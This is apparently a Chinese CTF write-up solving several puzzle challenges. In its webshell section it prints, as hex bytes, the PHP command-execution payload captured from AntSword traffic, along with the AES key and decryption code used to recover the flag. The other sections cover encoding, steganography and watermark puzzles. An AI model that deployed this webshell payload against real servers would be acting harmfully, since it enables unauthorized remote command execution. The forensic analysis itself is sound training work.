我果然不适合ctf,省级都进不了

附件(odg8)

misc1

开局一个txt

1-3

这种明显的乱码一看猜测可能就是编码转换的问题,之前一直猜想可能是UTF-8和GBK的转换,后来没什么效果,但是也不是没有收获。

txt另存为时发现文本编码是ASCII,但是默认Windows新建保存文本都会是UTF-8

2-3

HxD打开

3-2

ASCII切换为EBCDIC,得到有意义的文字,

4-3

末尾发现flag

flag{0a07c11e46af753fd24d40023f0fdce1}

misc2

无聊的一道题
1
根据题意推测出跟/dev/fd有关
/dev/fd是Linux的一个特性,/dev/fd是一个符号链接。如果您ls从不同的终端重复您的操作,则会发现指向不同的pty的链接。这些将与tty命令的输出匹配。
在该ls示例中,我可以想象描述符3是用于读取文件系统的描述符。一些open()支持文件描述符生成的C命令(例如)保证返回“编号最小的未使用文件描述符”(POSIX-注意,低级open()实际上不是标准C的一部分)。因此,它们在关闭后会被回收(如果您反复打开和关闭不同的文件,您将一次又一次得到3作为fd)。

访问/r然后Post提交data=/dev/fd/3
2
得到flag
3-1

misc3

保存下来是一个HTML,开始还猜测是snow隐写,但是并没有解出内容。直接查看源码也是查看不出内容的。

F12查看控制台,发现内容

5-3

Edit as HTML

‌​​‌‌​​‌‌​​‌​​‌‌‌​​‌‌‌‌​‌​​‌‌​​​‌​​​​‌​​‌​​‌‌​‌​‌‌​​‌‌​‌‌​​‌‌‌‌​‌‌​​​‌‌​‌​​‌‌‌​​‌‌​​​‌‌‌‌​​‌‌‌​‌‌‌​​‌‌‌​‌‌​​‌‌‌​‌‌​​‌​​​‌‌​​‌​‌​‌​​‌‌​‌​‌‌​​‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌​​‌‌​​‌‌‌​​‌‌​‌‌‌​​‌‌‌​‌​​‌‌​​‌‌‌​​​‌‌‌‌‌​​‌​‌​‌‌​​​‌‌​‌‌​​‌‌​​‌​​‌‌‌​‌‌​​‌‌‌​​‌‌​​​‌‌‌‌‌​​‌​‌​‌​​‌‌‌​‌‌​​‌‌​​‌‌‌​​​‌‌​‌‌​​‌‌​​‌‌​​​‌‌​‌​​​​​‌​

只有两种字符串‌​,猜测替换成01或者摩斯密码.

0110011001101100011000010110011101111011011001010011001001100001001110010110001100111000011000100011000100110001001101110011010101100101001101100011011001100011011001100011001000110001011001100011100000110101001110010011001101100010011000110011100000110101011000100110011000111001001100110011100101111101

01转字符串成功解密

6-1

flag{e2a9c8b1175e66cf21f8593bc85bf939}

webshell

蚁剑流量分析

导出全部HTTP到一个文件夹,找到最后的几个

这里使用的是Chr16模式,就是把括号里面的(0x??)转换为ASCII,不过手工转可能有点问题,末尾会有一截乱码。

8-1

使用脚本提取。

a=[0x40,0x69,0x6e,0x69,0x5f,0x73,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x70,0x6c,0x61,0x79,0x5f,0x65,0x72,0x72,0x6f,0x72,0x73,0x22,0x2c,0x20,0x22,0x30,0x22,0x29,0x3b,0x40,0x73,0x65,0x74,0x5f,0x74,0x69,0x6d,0x65,0x5f,0x6c,0x69,0x6d,0x69,0x74,0x28,0x30,0x29,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x29,0x7b,0x40,0x73,0x65,0x73,0x73,0x69,0x6f,0x6e,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x24,0x6b,0x65,0x79,0x3d,0x27,0x66,0x35,0x30,0x34,0x35,0x62,0x30,0x35,0x61,0x62,0x65,0x36,0x65,0x63,0x39,0x62,0x31,0x65,0x33,0x37,0x66,0x61,0x66,0x61,0x38,0x35,0x31,0x66,0x35,0x64,0x65,0x39,0x27,0x3b,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x40,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x6f,0x70,0x65,0x6e,0x73,0x73,0x6c,0x5f,0x65,0x6e,0x63,0x72,0x79,0x70,0x74,0x28,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x65,0x6e,0x63,0x6f,0x64,0x65,0x28,0x24,0x6f,0x75,0x74,0x29,0x2c,0x20,0x27,0x41,0x45,0x53,0x2d,0x31,0x32,0x38,0x2d,0x45,0x43,0x42,0x27,0x2c,0x20,0x24,0x6b,0x65,0x79,0x2c,0x20,0x4f,0x50,0x45,0x4e,0x53,0x53,0x4c,0x5f,0x52,0x41,0x57,0x5f,0x44,0x41,0x54,0x41,0x29,0x29,0x3b,0x7d,0x3b,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x7b,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x3d,0x6f,0x62,0x5f,0x67,0x65,0x74,0x5f,0x63,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x73,0x28,0x29,0x3b,0x6f,0x62,0x5f,0x65,0x6e,0x64,0x5f,0x63,0x6c,0x65,0x61,0x6e,0x28,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x38,0x63,0x32,0x62,0x34,0x22,0x3b,0x65,0x63,0x68,0x6f,0x20,0x40,0x61,0x73,0x65,0x6e,0x63,0x28,0x24,0x6f,0x75,0x74,0x70,0x75,0x74,0x29,0x3b,0x65,0x63,0x68,0x6f,0x20,0x22,0x65,0x32,0x65,0x31,0x30,0x22,0x3b,0x7d,0x6f,0x62,0x5f,0x73,0x74,0x61,0x72,0x74,0x28,0x29,0x3b,0x74,0x72,0x79,0x7b,0x24,0x70,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x31,0x62,0x34,0x64,0x34,0x35,0x36,0x63,0x37,0x32,0x39,0x37,0x64,0x22,0x5d,0x29,0x3b,0x24,0x73,0x3d,0x62,0x61,0x73,0x65,0x36,0x34,0x5f,0x64,0x65,0x63,0x6f,0x64,0x65,0x28,0x24,0x5f,0x50,0x4f,0x53,0x54,0x5b,0x22,0x30,0x78,0x62,0x39,0x62,0x34,0x35,0x36,0x38,0x38,0x61,0x35,0x61,0x30,0x38,0x22,0x5d,0x29,0x3b,0x24,0x64,0x3d,0x64,0x69,0x72,0x6e,0x61,0x6d,0x65,0x28,0x24,0x5f,0x53,0x45,0x52,0x56,0x45,0x52,0x5b,0x22,0x53,0x43,0x52,0x49,0x50,0x54,0x5f,0x46,0x49,0x4c,0x45,0x4e,0x41,0x4d,0x45,0x22,0x5d,0x29,0x3b,0x24,0x63,0x3d,0x73,0x75,0x62,0x73,0x74,0x72,0x28,0x24,0x64,0x2c,0x30,0x2c,0x31,0x29,0x3d,0x3d,0x22,0x2f,0x22,0x3f,0x22,0x2d,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3a,0x22,0x2f,0x63,0x20,0x5c,0x22,0x7b,0x24,0x73,0x7d,0x5c,0x22,0x22,0x3b,0x24,0x72,0x3d,0x22,0x7b,0x24,0x70,0x7d,0x20,0x7b,0x24,0x63,0x7d,0x22,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x66,0x65,0x28,0x24,0x66,0x29,0x7b,0x24,0x64,0x3d,0x65,0x78,0x70,0x6c,0x6f,0x64,0x65,0x28,0x22,0x2c,0x22,0x2c,0x40,0x69,0x6e,0x69,0x5f,0x67,0x65,0x74,0x28,0x22,0x64,0x69,0x73,0x61,0x62,0x6c,0x65,0x5f,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x73,0x22,0x29,0x29,0x3b,0x69,0x66,0x28,0x65,0x6d,0x70,0x74,0x79,0x28,0x24,0x64,0x29,0x29,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x28,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x64,0x3d,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x74,0x72,0x69,0x6d,0x27,0x2c,0x61,0x72,0x72,0x61,0x79,0x5f,0x6d,0x61,0x70,0x28,0x27,0x73,0x74,0x72,0x74,0x6f,0x6c,0x6f,0x77,0x65,0x72,0x27,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x5f,0x65,0x78,0x69,0x73,0x74,0x73,0x28,0x24,0x66,0x29,0x26,0x26,0x69,0x73,0x5f,0x63,0x61,0x6c,0x6c,0x61,0x62,0x6c,0x65,0x28,0x24,0x66,0x29,0x26,0x26,0x21,0x69,0x6e,0x5f,0x61,0x72,0x72,0x61,0x79,0x28,0x24,0x66,0x2c,0x24,0x64,0x29,0x29,0x3b,0x7d,0x3b,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x63,0x29,0x7b,0x24,0x72,0x65,0x74,0x3d,0x30,0x3b,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x7b,0x40,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x27,0x29,0x29,0x7b,0x40,0x70,0x61,0x73,0x73,0x74,0x68,0x72,0x75,0x28,0x24,0x63,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x73,0x68,0x65,0x6c,0x6c,0x5f,0x65,0x78,0x65,0x63,0x28,0x24,0x63,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x65,0x78,0x65,0x63,0x27,0x29,0x29,0x7b,0x40,0x65,0x78,0x65,0x63,0x28,0x24,0x63,0x2c,0x24,0x6f,0x2c,0x24,0x72,0x65,0x74,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x28,0x6a,0x6f,0x69,0x6e,0x28,0x22,0xa,0x22,0x2c,0x24,0x6f,0x29,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x70,0x6f,0x70,0x65,0x6e,0x27,0x29,0x29,0x7b,0x24,0x66,0x70,0x3d,0x40,0x70,0x6f,0x70,0x65,0x6e,0x28,0x24,0x63,0x2c,0x27,0x72,0x27,0x29,0x3b,0x77,0x68,0x69,0x6c,0x65,0x28,0x21,0x40,0x66,0x65,0x6f,0x66,0x28,0x24,0x66,0x70,0x29,0x29,0x7b,0x70,0x72,0x69,0x6e,0x74,0x28,0x40,0x66,0x67,0x65,0x74,0x73,0x28,0x24,0x66,0x70,0x2c,0x20,0x32,0x30,0x34,0x38,0x29,0x29,0x3b,0x7d,0x40,0x70,0x63,0x6c,0x6f,0x73,0x65,0x28,0x24,0x66,0x70,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x69,0x66,0x28,0x66,0x65,0x28,0x27,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x27,0x29,0x29,0x7b,0x40,0x61,0x6e,0x74,0x73,0x79,0x73,0x74,0x65,0x6d,0x28,0x24,0x63,0x29,0x3b,0x7d,0x65,0x6c,0x73,0x65,0x7b,0x24,0x72,0x65,0x74,0x20,0x3d,0x20,0x31,0x32,0x37,0x3b,0x7d,0x72,0x65,0x74,0x75,0x72,0x6e,0x20,0x24,0x72,0x65,0x74,0x3b,0x7d,0x3b,0x24,0x72,0x65,0x74,0x3d,0x40,0x72,0x75,0x6e,0x63,0x6d,0x64,0x28,0x24,0x72,0x2e,0x22,0x20,0x32,0x3e,0x26,0x31,0x22,0x29,0x3b,0x70,0x72,0x69,0x6e,0x74,0x20,0x28,0x24,0x72,0x65,0x74,0x21,0x3d,0x30,0x29,0x3f,0x22,0x72,0x65,0x74,0x3d,0x7b,0x24,0x72,0x65,0x74,0x7d,0x22,0x3a,0x22,0x22,0x3b,0x3b,0x7d,0x63,0x61,0x74,0x63,0x68,0x28,0x45,0x78,0x63,0x65,0x70,0x74,0x69,0x6f,0x6e,0x20,0x24,0x65,0x29,0x7b,0x65,0x63,0x68,0x6f,0x20,0x22,0x45,0x52,0x52,0x4f,0x52,0x3a,0x2f,0x2f,0x22,0x2e,0x24,0x65,0x2d,0x3e,0x67,0x65,0x74,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x28,0x29,0x3b,0x7d,0x3b,0x61,0x73,0x6f,0x75,0x74,0x70,0x75,0x74,0x28,0x29,0x3b,0x64,0x69,0x65,0x28,0x29,0x3b]//内容自己替换就好,这里我忘了是哪个流的内容了
b=''
for i in a:
	#print chr(i)
	b+=chr(i)
print b

转出来是这个样子

8-2

shell14是需要chr解密的内容,15是aes解密的内容,AES的key已经在shell14给出

9-1

$key='f5045b05abe6ec9b1e37fafa851f5de9'

使用openssl解密,kali自带,编写解密php

<?php
$key='f5045b05abe6ec9b1e37fafa851f5de9';
$d = "kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5";
$m = openssl_decrypt(base64_decode($d) , 'AES-128-ECB', $key, OPENSSL_RAW_DATA);
echo base64_decode($m);
?>

解出AES内容

10

看起来像base64,解密一下

11-1

flag{AntSword_is_Powerful_3222222!!!!}

twocats

异或看一下

12-1

看出来两张图片有不一样的像素,不是异或就试一下盲水印

提取出图片

cat

flag{BlindWaterMark1234}
#出题人真省心